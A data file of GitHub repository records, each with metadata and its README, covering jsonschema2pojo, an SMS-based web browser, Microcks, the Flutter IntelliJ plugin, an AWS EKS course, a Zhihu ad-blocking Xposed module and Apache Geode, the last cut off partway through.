joelittlejohn/jsonschema2pojo,master,6145,1642,2013-06-22T22:28:53Z,11783,209,"Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc",ant-task gradle-plugin gson jackson java json json-schema maven-plugin,"# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22)
_jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson.
### [Try jsonschema2pojo online](http://jsonschema2pojo.org/) or `brew install jsonschema2pojo`
You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how.
A very simple Maven example:
```xml
org.jsonschema2pojojsonschema2pojo-maven-plugin1.2.1${basedir}/src/main/resources/schemacom.example.typesgenerate
```
A very simple Gradle example:
```groovy
plugins {
id ""java""
id ""org.jsonschema2pojo"" version ""1.2.1""
}
repositories {
mavenCentral()
}
dependencies {
implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2'
}
jsonSchema2Pojo {
targetPackage = 'com.example'
}
```
Useful pages:
* **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)**
* **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)**
* [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference)
* [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/)
* [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html)
* [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage)
* [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html)
Project resources:
* [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases)
* [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users)
Special thanks:
* unkish
* Thach Hoang
* Dan Cruver
* Ben Manes
* Sam Duke
* Duane Zamrok
* Christian Trimble
* YourKit, who support this project through a free license for the [YourKit Java Profiler](https://www.yourkit.com/java/profiler).
Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
"
lukeaschenbrenner/TxtNet-Browser,master,1018,25,2022-03-22T22:50:34Z,18930,12,An app that lets you browse the web over SMS,,"# TxtNet Browser
### Browse the Web over SMS, no WiFi or Mobile Data required!
> **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️**
TextNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium of transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)).
In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks.
## Download
### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon.
TxtNet Browser is currently compatible with Android 4.4-13+.
## Running Server Instances (uptime not guaranteed)
| Country | Phone Number | Notes |
| :--- | :----: | :--- |
| United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) |
| | | |
Let me know if you are interested in hosting a server instance for your area!
> ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server!
## How it works (client)
This app uses a permission that allows a broadcast reciever to recieve and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions are compartamentalized to the server module. This ensures that unless the app is setup to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programatically sent to and recieved from a registered server phone number.
The app communicates with a ""server phone number"", which is a phone number controlled by a ""server host"" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any Javascript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying.
Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient!
#### Why encode the HTML in the first place?
SMS was created in 1984, and was created to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project.
## Server Hosting
TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication.
To enable the background service, tap on the overflow menu and select ""TxtNet Server Hosting"". Once the necessary permissions are granted, you can press on the ""Start Service"" toggle to initialize a background service.
TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to.
Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter.
For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Skizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/).
##### Desktop Server Installation (Deprecated)
The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below:
1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts)
2. Create a Twilio application for the number.
3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application
4. Open the ngrok directory and run this command: `./ngrok tcp 5000`
5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the ""A Message Comes In"" section after selecting ""webhook"". For example: ""https://xyz.ngrok.io/receive_sms""
6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using ""pip install x""
7. Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py`
8. In the TxtNet Browser app, press the three dots and press ""Change Server Phone Number"". Enter in the phone number you purchased from Twilio and press OK!
## FAQ/Troubleshooting
Bugs:
- Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it ""stalled"" while loading on large pages. As of now the only way to fix this is to wait!
- In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are recieved by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again.
- In Android 12 (or possibly a new version of Google Messages?), there is a new and ""improved"" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this ""feature"", you can silent message notifications from the server phone number.
## Screenshots (TxtNet 1.0)
##### Demo (TxtNet 1.0)
https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4
> Demo video shown above
## Development
### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app.
Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community.
## Future Impact
My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include:
- Those in countries with a low median income and prohibitively expensive data plans
- Those who live under oppressive governments, with near impenetrable internet censorship
If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description!
## License
GPLv3 - See LICENSE.md
## Credits
Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project!
My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202).
In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
"
microcks/microcks,master,1196,191,2015-02-23T15:46:09Z,5464,84,Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀,api api-testing asyncapi asyncapi-specification cncf cncf-project event-driven graphql kubernetes mock mock-server mocking openapi openapi-tooling openapi3 openapi31 postman-collection swagger swagger2 testing,"
[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions)
[![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags)
[![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)]((https://search.maven.org/artifact/io.github.microcks/microcks))
[![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0)
[![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/)
# Microcks - Kubernetes native tool for API Mocking & Testing
Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds.
It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI.
## Getting Started
* [Documentation](https://microcks.io/documentation/getting-started/)
To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md).
## Build Status
The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions)
#### Sonarcloud Quality metrics
[![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks)
## Versions
Here are the naming conventions we're using for current releases, ongoing development maintenance activities.
| Status | Version | Branch | Container images tags |
| ----------- |------------------|----------|----------------------------------|
| Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` |
| Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` |
| Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` |
## How to build Microcks
The build instructions are available in the [contribution guide](CONTRIBUTING.md).
## Thanks to community!
[![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers)
[![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members)
"
flutter/flutter-intellij,master,1945,308,2016-07-25T22:31:03Z,161597,692,Flutter Plugin for IntelliJ,flutter intellij-plugin java,"# Flutter Plugin for IntelliJ
[![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter)
[![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij)
An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform
app SDK to help developers and designers build modern apps for iOS, Android and the web.
## Documentation
- [flutter.dev](https://flutter.dev)
- [Installing Flutter](https://flutter.dev/docs/get-started/install)
- [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide)
## Fast development
Flutter's hot reload helps you quickly and easily experiment, build UIs, add features,
and fix bugs faster. Experience sub-second reload times, without losing state, on emulators,
simulators, and hardware for iOS and Android.
## Quick-start
A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide):
- install the [Flutter SDK](https://flutter.dev/docs/get-started/install)
- run `flutter doctor` from the command line to verify your installation
- ensure you have a supported IntelliJ development environment; either:
- the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported)
- the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported)
- open the plugin preferences
- `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select ""Browse repositories…""
- search for and install the 'Flutter' plugin
- choose the option to restart IntelliJ
- configure the Flutter SDK setting
- `Preferences` on macOS, `File>Settings` on Linux, select `Languages & Frameworks > Flutter`, and set
the path to the root of your flutter repo
## Filing issues
Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues)
for Flutter IntelliJ issues.
- for more general Flutter issues, you should prefer to use the Flutter
[issue tracker](https://github.com/flutter/flutter/issues)
- for more Dart IntelliJ related issues, you can use JetBrains'
[YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20)
## Known issues
Please note the following known issues:
- [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will
read the PATH variable just once on startup. Thus, if you change PATH later to
include the Flutter SDK path, this will not have an affect in IntelliJ until you
restart the IDE.
- If you require network access to go through proxy settings, you will need to set the
`https_proxy` variable in your environment as described in the
[pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall).
(See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).)
## Dev Channel
If you like getting new features as soon as they've been added to the code then you
might want to try out the dev channel. It is updated weekly with the latest contents
from the ""master"" branch. It has minimal testing. Set up instructions are in the wiki's
[dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel).
"
stacksimplify/aws-eks-kubernetes-masterclass,master,1220,5777,2020-04-20T11:41:14Z,52970,37,"AWS EKS Kubernetes - Masterclass | DevOps, Microservices",aws-alb aws-alb-ingress-controller aws-cloudwatch aws-codebuild aws-codecommit aws-codepipeline aws-ebs aws-eks aws-eks-cluster aws-fargate aws-rds docker fluentd kubernetes kubernetes-deployment kubernetes-pods kubernetes-secrets kubernetes-services yaml,"# AWS EKS - Elastic Kubernetes Service - Masterclass
[![Image](https://stacksimplify.com/course-images/AWS-EKS-Kubernetes-Masterclass-DevOps-Microservices-course.png ""AWS EKS Kubernetes - Masterclass"")](https://www.udemy.com/course/aws-eks-kubernetes-masterclass-devops-microservices/?referralCode=257C9AD5B5AF8D12D1E1)
## Course Modules
| S.No | AWS Service Name |
| ---- | ---------------- |
| 1. | Create AWS EKS Cluster using eksctl CLI |
| 2. | [Docker Fundamentals](https://github.com/stacksimplify/docker-fundamentals) |
| 3. | [Kubernetes Fundamentals](https://github.com/stacksimplify/kubernetes-fundamentals) |
| 4. | EKS Storage with AWS EBS CSI Driver |
| 5. | Kubernetes Important Concepts for Application Deployments |
| 5.1 | Kubernetes - Secrets |
| 5.2 | Kubernetes - Init Containers |
| 5.3 | Kubernetes - Liveness & Readiness Probes |
| 5.4 | Kubernetes - Requests & Limits |
| 5.5 | Kubernetes - Namespaces, Limit Range and Resource Quota |
| 6. | EKS Storage with AWS RDS MySQL Database |
| 7. | Load Balancing using CLB & NLB |
| 7.1 | Load Balancing using CLB - AWS Classic Load Balancer |
| 7.2 | Load Balancing using NLB - AWS Network Load Balancer |
| 8. | Load Balancing using ALB - AWS Application Load Balancer |
| 8.1 | ALB Ingress Controller - Install |
| 8.2 | ALB Ingress - Basics |
| 8.3 | ALB Ingress - Context path based routing |
| 8.4 | ALB Ingress - SSL |
| 8.5 | ALB Ingress - SSL Redirect HTTP to HTTPS |
| 8.6 | ALB Ingress - External DNS |
| 9. | Deploy Kubernetes workloads on AWS Fargate Serverless |
| 9.1 | AWS Fargate Profiles - Basic |
| 9.2 | AWS Fargate Profiles - Advanced using YAML |
| 10. | Build and Push Container to AWS ECR and use that in EKS |
| 11. | DevOps with AWS Developer Tools CodeCommit, CodeBuild and CodePipeline |
| 12. | Microservices Deployment on EKS - Service Discovery |
| 13. | Microservices Distributed Tracing using AWS X-Ray |
| 14. | Microservices Canary Deployments |
| 15. | EKS HPA - Horizontal Pod Autosaler |
| 16. | EKS VPA - Vertical Pod Autosaler |
| 17. | EKS CA - Cluster Autosaler |
| 18. | EKS Monitoring using CloudWatch Agent & Fluentd - Container Insights |
## AWS Services Covered
| S.No | AWS Service Name |
| ---- | ---------------- |
| 1. | AWS EKS - Elastic Kubernetes Service |
| 2. | AWS EBS - Elastic Block Store |
| 3. | AWS RDS - Relational Database Service MySQL |
| 4. | AWS CLB - Classic Load Balancer |
| 5. | AWS NLB - Network Load Balancer |
| 6. | AWS ALB - Application Load Balancer |
| 7. | AWS Fargate - Serverless |
| 8. | AWS ECR - Elastic Container Registry |
| 9. | AWS Developer Tool - CodeCommit |
| 10. | AWS Developer Tool - CodeBuild |
| 11. | AWS Developer Tool - CodePipeline |
| 12. | AWS X-Ray |
| 13. | AWS CloudWatch - Container Insights |
| 14. | AWS CloudWatch - Log Groups & Log Insights |
| 15. | AWS CloudWatch - Alarms |
| 16. | AWS Route53 |
| 17. | AWS Certificate Manager |
| 18. | EKS CLI - eksctl |
## Kubernetes Concepts Covered
| S.No | Kubernetes Concept Name |
| ---- | ------------------- |
| 1. | Kubernetes Architecture |
| 2. | Pods |
| 3. | ReplicaSets |
| 4. | Deployments |
| 5. | Services - Node Port Service |
| 6. | Services - Cluster IP Service |
| 7. | Services - External Name Service |
| 8. | Services - Ingress Service |
| 9. | Services - Ingress SSL & SSL Redirect |
| 10. | Services - Ingress & External DNS |
| 11. | Imperative - with kubectl |
| 12. | Declarative - Declarative with YAML |
| 13. | Secrets |
| 14. | Init Containers |
| 15. | Liveness & Readiness Probes |
| 16. | Requests & Limits |
| 17. | Namespaces - Imperative |
| 18. | Namespaces - Limit Range |
| 19. | Namespaces - Resource Quota |
| 20. | Storage Classes |
| 21. | Persistent Volumes |
| 22. | Persistent Volume Claims |
| 23. | Services - Load Balancers |
| 24. | Annotations |
| 25. | Canary Deployments |
| 26. | HPA - Horizontal Pod Autoscaler |
| 27. | VPA - Vertical Pod Autoscaler |
| 28. | CA - Cluster Autoscaler |
| 29. | DaemonSets |
| 30. | DaemonSets - Fluentd for logs |
| 31. | Config Maps |
## List of Docker Images on Docker Hub
| Application Name | Docker Image Name |
| ----------------- | ----------------- |
| Simple Nginx V1 | stacksimplify/kubenginx:1.0.0 |
| Spring Boot Hello World API | stacksimplify/kube-helloworld:1.0.0 |
| Simple Nginx V2 | stacksimplify/kubenginx:2.0.0 |
| Simple Nginx V3 | stacksimplify/kubenginx:3.0.0 |
| Simple Nginx V4 | stacksimplify/kubenginx:4.0.0 |
| Backend Application | stacksimplify/kube-helloworld:1.0.0 |
| Frontend Application | stacksimplify/kube-frontend-nginx:1.0.0 |
| Kube Nginx App1 | stacksimplify/kube-nginxapp1:1.0.0 |
| Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 |
| Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 |
| User Management Microservice with MySQLDB | stacksimplify/kube-usermanagement-microservice:1.0.0 |
| User Management Microservice with H2 DB | stacksimplify/kube-usermanagement-microservice:2.0.0-H2DB |
| User Management Microservice with MySQL DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:3.0.0-AWS-XRay-MySQLDB |
| User Management Microservice with H2 DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:4.0.0-AWS-XRay-H2DB |
| Notification Microservice V1 | stacksimplify/kube-notifications-microservice:1.0.0 |
| Notification Microservice V2 | stacksimplify/kube-notifications-microservice:2.0.0 |
| Notification Microservice V1 with AWS X-Ray | stacksimplify/kube-notifications-microservice:3.0.0-AWS-XRay |
| Notification Microservice V2 with AWS X-Ray | stacksimplify/kube-notifications-microservice:4.0.0-AWS-XRay |
## List of Docker Images you build in AWS ECR
| Application Name | Docker Image Name |
| ----------------- | ----------------- |
| AWS Elastic Container Registry | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/aws-ecr-kubenginx:DATETIME-REPOID |
| DevOps Usecase | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/eks-devops-nginx:DATETIME-REPOID |
## Sample Applications
- User Management Microservice
- Notification Miroservice
- Nginx Applications
## What will students learn in your course?
- You will write kubernetes manifests with confidence after going through live template writing sections
- You will learn 30+ kubernetes concepts and use 18 AWS Services in combination with EKS
- You will learn Kubernetes Fundamentals in both imperative and declarative approaches
- You will learn writing & deploying k8s manifests for storage concepts like storage class, persistent volume claim pvc, mysql and EBS CSI Driver
- You will learn to switch from native EBS Storage to RDS Database using k8s external name service
- You will learn writing and deploying load balancer k8s manifests for Classic and Network load balancers
- You will learn writing ingress k8s manifests by enabling features like context path based routing, SSL, SSL Redirect and External DNS.
- You will learn writing k8s manifests for advanced fargate profiles and do mixed mode workload deployments in both EC2 and Fargate Serverless
- You will learn using ECR - Elastic Container Registry in combination with EKS.
- You will implement DevOps concepts with AWS Code Services like CodeCommit, CodeBuild and CodePipeline
- You will implement microservices core cocepts like Service Discovery, Distributed Tracing using X-Ray and Canary Deployments
- You will learn to enable Autoscaling features like HPA,VPA and Cluster Autoscaler
- You will learn to enable monitoring and logging for EKS cluster and workloads in cluster using CloudWatch Container Insights
- You will learn Docker fundamentals by implementing usecases like download image from Docker Hub and run on local desktop and build an image locally, test and push to Docker Hub.
- You will slowly start by learning Docker Fundamentals and move on to Kubenetes.
- You will master many kubectl commands over the process
## Are there any course requirements or prerequisites?
- You must have an AWS account to follow with me for hands-on activities.
- You dont need to have any basic Docker or kubernetes knowledge to start this course.
## Who are your target students?
- AWS Architects or Sysadmins or Developers who are planning to master Elastic Kubernetes Service (EKS) for running applications on Kubernetes
- Any beginner who is interested in learning kubernetes on cloud using AWS EKS.
- Any beginner who is interested in learning Kubernetes DevOps and Microservices deployments on Kubernetes
## Each of my courses come with
- Amazing Hands-on Step By Step Learning Experiences
- Real Implementation Experience
- Friendly Support in the Q&A section
- 30 Day ""No Questions Asked"" Money Back Guarantee!
## My Other AWS Courses
- [Udemy Enroll](https://github.com/stacksimplify/udemy-enroll)
## Stack Simplify Udemy Profile
- [Udemy Profile](https://www.udemy.com/user/kalyan-reddy-9/)
# Azure Kubernetes Service with Azure DevOps and Terraform
[![Image](https://stacksimplify.com/course-images/azure-kubernetes-service-with-azure-devops-and-terraform.png ""Azure Kubernetes Service with Azure DevOps and Terraform"")](https://www.udemy.com/course/azure-kubernetes-service-with-azure-devops-and-terraform/?referralCode=2499BF7F5FAAA506ED42)
"
shatyuka/Zhiliao,master,2119,76,2020-11-09T07:17:35Z,201195,30,知乎去广告Xposed模块,xposed zhihu zhiliao,"# 知了
知乎去广告Xposed模块
[![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ)
[![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao)
[![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest)
[![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao)
[![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/)
## 功能
- 广告
- 去启动页广告
- 去信息流广告
- 去回答列表广告
- 去评论广告
- 去分享广告
- 去回答底部广告
- 去搜索广告
- 其他
- 过滤视频
- 过滤文章
- 去信息流会员推荐
- 去回答圈子
- 去商品推荐
- 去相关搜索
- 去关键字搜索
- 直接打开外部链接
- 禁止切换色彩模式
- 显示卡片类别
- 状态栏沉浸
- 禁止进入全屏模式
- 解锁第三方登录
- 界面净化
- 移除直播按钮
- 不显示小红点
- 隐藏会员卡片
- 隐藏热点通知
- 精简文章页面
- 隐藏置顶热门
- 隐藏混合卡片
- 导航栏
- 隐藏会员按钮
- 隐藏视频按钮
- 隐藏关注按钮
- 隐藏发布按钮
- 隐藏发现按钮
- 禁用活动主题
- 隐藏导航栏突起
- 左右划
- 左右划切换回答
- 移除下一个回答按钮
- 自定义过滤
- 注入JS脚本
- 清理临时文件
## 帮助
[Github Wiki](https://github.com/shatyuka/Zhiliao/wiki)
## 下载
[Github Release](https://github.com/shatyuka/Zhiliao/releases/latest)
[Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao)
[蓝奏云](https://wwa.lanzoux.com/b00tscbwd) 密码:1hax
## License
This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/).
"
apache/geode,develop,2267,681,2015-04-30T07:00:05Z,224880,22,Apache Geode,apache datagrid geode,"
## Contents
1. [Overview](#overview)
2. [How to Get Apache Geode](#obtaining)
3. [Main Concepts and Components](#concepts)
4. [Location of Directions for Building from Source](#building)
5. [Geode in 5 minutes](#started)
6. [Application Development](#development)
7. [Documentation](https://geode.apache.org/docs/)
8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index)
9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute)
10. [Export Control](#export)
## Overview
[Apache Geode](http://geode.apache.org/) is
a data management platform that provides real-time, consistent access to
data-intensive applications throughout widely distributed cloud architectures.
Apache Geode pools memory, CPU, network resources, and optionally local disk
across multiple processes to manage application objects and behavior. It uses
dynamic replication and data partitioning techniques to implement high
availability, improved performance, scalability, and fault tolerance. In
addition to being a distributed data container, Apache Geode is an in-memory
data management system that provides reliable asynchronous event notifications
and guaranteed message delivery.
Apache Geode is a mature, robust technology originally developed by GemStone
Systems. Commercially available as GemFire™, it was first deployed in the
financial sector as the transactional, low-latency data engine used in Wall
Street trading platforms. Today Apache Geode technology is used by hundreds of
enterprise customers for high-scale business applications that must meet low
latency and 24x7 availability requirements.
## How to Get Apache Geode
You can download Apache Geode from the
[website](https://geode.apache.org/releases/), run a Docker
[image](https://hub.docker.com/r/apachegeode/geode/), or install with
[Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. Application developers
can load dependencies from [Maven
Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22).
Maven
```xml
org.apache.geodegeode-core$VERSION
```
Gradle
```groovy
dependencies {
compile ""org.apache.geode:geode-core:$VERSION""
}
```
## Main Concepts and Components
_Caches_ are an abstraction that describe a node in an Apache Geode distributed
system.
Within each cache, you define data _regions_. Data regions are analogous to
tables in a relational database and manage data in a distributed fashion as
name/value pairs. A _replicated_ region stores identical copies of the data on
each cache member of a distributed system. A _partitioned_ region spreads the
data among cache members. After the system is configured, client applications
can access the distributed data in regions without knowledge of the underlying
system architecture. You can define listeners to receive notifications when
data has changed, and you can define expiration criteria to delete obsolete
data in a region.
_Locators_ provide clients with both discovery and server load balancing
services. Clients are configured with locator information, and the locators
maintain a dynamic list of member servers. The locators provide clients with
connection information to a server.
Apache Geode includes the following features:
* Combines redundancy, replication, and a ""shared nothing"" persistence
architecture to deliver fail-safe reliability and performance.
* Horizontally scalable to thousands of cache members, with multiple cache
topologies to meet different enterprise needs. The cache can be
distributed across multiple computers.
* Asynchronous and synchronous cache update propagation.
* Delta propagation distributes only the difference between old and new
versions of an object (delta) instead of the entire object, resulting in
significant distribution cost savings.
* Reliable asynchronous event notifications and guaranteed message delivery
through optimized, low latency distribution layer.
